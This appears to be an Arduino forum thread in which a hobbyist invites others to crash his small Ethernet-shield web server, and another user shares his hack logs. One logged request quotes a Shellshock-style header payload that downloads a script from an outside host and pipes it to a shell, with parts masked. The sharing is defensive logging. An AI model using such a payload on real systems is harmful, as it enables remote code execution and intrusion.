Crash my web server, please!

Please crash my web server if you can. I've had it on the internet for a couple of days and it hasn't even lost one socket yet. I can't leave it on the internet forever. I need it for testing other projects. http://68.99.58.120

Some of the things others tried were: sending a request without a return character. Didn't work. The request timed out. sending a malformed file name with illegal characters. Didn't work. The sender got an error 400 message. sending a request for non existent files. Didn't work. The sender got an error 404 message. sender connected without sending anything and didn't disconnect. Didn't work. The socket closed in 30 seconds. sender tried a DoS attack. Didn't work. It recovered without any intervention from me.

Got something you would like to try? I'm trying to make my server code as bulletproof as possible, so if you would be so kind as to give it your best shot, it would be appreciated.

edit: The device is a Mega 2560 with an Arduino Ethernet shield (w5100) running the example sketch from the playground. Nothing changed but the static IP assignment. http://playground.arduino.cc/Code/WebServerST

SurferTim: Please crash my web server if you can. I've had it on the internet for a couple of days and it hasn't even lost one socket yet. I can't leave it on the internet forever. I need it for testing other projects. http://68.99.58.120

Some of the things others tried were: sending a request without a return character. Didn't work. The request timed out. sending a malformed file name with illegal characters. Didn't work. The sender got an error 400 message. sending a request for non existent files. Didn't work. The sender got an error 404 message. sender connected without sending anything and didn't disconnect. Didn't work. The socket closed in 30 seconds. sender tried a DoS attack. Didn't work. It recovered without any intervention from me.

Got something you would like to try? I'm trying to make my server code as bulletproof as possible, so if you would be so kind as to give it your best shot, it would be appreciated.

edit: The device is a Mega 2560 with an Arduino Ethernet shield (w5100) running the example sketch from the playground. Nothing changed but the static IP assignment. http://playground.arduino.cc/Code/WebServerST

Hi

Check out the HACKLOGS folder on my system's SD card at http://www.2wg.co.nz/. Every hack attempt that my system receives and recognises is in the daily files that you are able to download - there is about 18 months of daily files available.

I recently did some work to transform cross site script attacks so that anyone downloading these hack files should not be impacted by the embedded scripts in the hacklog html requests. For example this XSS hack came in this morning:

10:02:33 ** HTML REQUEST **
- Browser IP: 46.151.212.26
- Socket #: 1
- Dest Port: 50661
- GET / HTTP/1.0
- USER-AGENT: () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH
- HOST: () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH
- REFERER: () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH
- COOKIE: () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH
- CONNECTION: () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH
- CONTENT-LENGTH: () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH | PE**
- () { :; }; /US**/WG** -QO- HTTP://XYZ-NOT.ME/R/X.SH | SH
-

I have also in the past had to do some work to cater for very large XSS scripts that were causing my html request cache to overflow and crash my system - but that is all sorted now.

Sorry, I won't bother hacking your system - don't have the time to write up some html hack requests.

My system is very reliable and has run without crashing for maybe six months now. It normally only restarts when I reload it with a code change.

However it did go down today one hour after the power was cut when the UPS backup battery ran out.

Keep up the good work. It is one thing to build an Arduino web server website. It is another thing to make it impregnable to all known website attacks.

Cheers

Catweazle NZ

Is the final line of your web page source code wrong:

<HTML>
<HEAD><link rel="stylesheet" type="text/css" href="defcss.css">
<script src="testjs.js"></script>
</HEAD>

<BODY>
<TABLE align=center width=50%><TR><TD colspan=2 align=center>
<h2>Home Page</h2>

</TD></TR><TR><TD align=center>
<a href="/testhtml.htm" onclick="testjs()">Waterfall</a>
</TD><TD align=center><a href="/soccer.htm">Soccer</a>

</TD></TR>
<TR><TD align=center><a href="/mytest.php">Test form</a></TD></TR>
</TABLE>
</BODY>
<HTML>

Should be I think.

Cheers

Probably should. But despite that, it still hasn't crashed. Not even lost one socket yet.

Thanks Catweasle for your contributions to my server. Part of the code was suggested by you. And BTW, a power fail does not count as a server crash, ;)

edit Test is over.